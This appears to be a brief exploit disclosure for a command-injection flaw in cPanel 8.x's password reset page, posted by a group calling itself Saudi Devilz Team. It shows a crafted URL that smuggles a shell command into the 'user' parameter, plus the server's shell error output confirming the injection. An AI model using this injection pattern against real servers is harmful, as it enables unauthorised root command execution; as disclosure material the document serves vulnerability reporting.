When trying to change a user password in Cpanel 8.x.x, it is possible to execute commands as root. Exploitation included.
b0fe35e9a94148384b318c44d5d223fd32ceb4ef21173dbdf28866c4156cc642
Hi all
when i tried to rest my pass
i'm tried this url:
http://cpanel.com:2082/resetpass/?user=|">ls"|
it give me this
*/
sh: line 1: /var/cpanel/users/: is a directory "sh: line 1: >ls: command not found"
Password Reset
Resetting password for |">ls"|: A confirmation email has been sent to the email address on file.
*/
look @ this!
sh: line 1: >ls: command not found
is it a problem ? :S
-------
ThanX
Arab VieruZ
Saudi Devilz Team